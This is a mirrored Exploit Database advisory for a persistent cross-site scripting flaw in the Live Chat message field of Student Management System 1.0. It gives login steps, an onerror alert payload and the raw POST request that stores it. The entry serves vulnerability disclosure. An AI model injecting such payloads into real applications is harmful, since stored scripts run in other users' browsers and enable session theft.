Student Management System 1.0 – ‘message’ Persistent Cross-Site Scripting (Authenticated)

• Exploit Database
• 122 阅读

• 作者： mohsen khashei
  日期： 2021-05-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49865/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

  # Exploit Title: Student Management System 1.0 - &apos;message&apos; Persistent Cross-Site Scripting (Authenticated) # Date: 2021-05-13 # Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com # Vendor Homepage: https://github.com/amirhamza05/Student-Management-System # Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip # Version: 1.0 # Tested on: ubuntu 20.04.2   # --- Description --- #   # The web application allows for anAttacker to inject persistent Cross-Site-Scripting payload in Live Chat.     # --- Proof of concept --- #   1- Login to Student Management System 2- Click on Live Chat button 3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image> 5- Xss popup will be triggered.     # --- Malicious Request --- #   POST /nav_bar_action.php HTTP/1.1 Host: (HOST) Cookie: (PHPSESSID) Content-Length: 96   send_message_chat%5Bmessage%5D=<image src=1 onerror="javascript:alert(document.domain)"></image>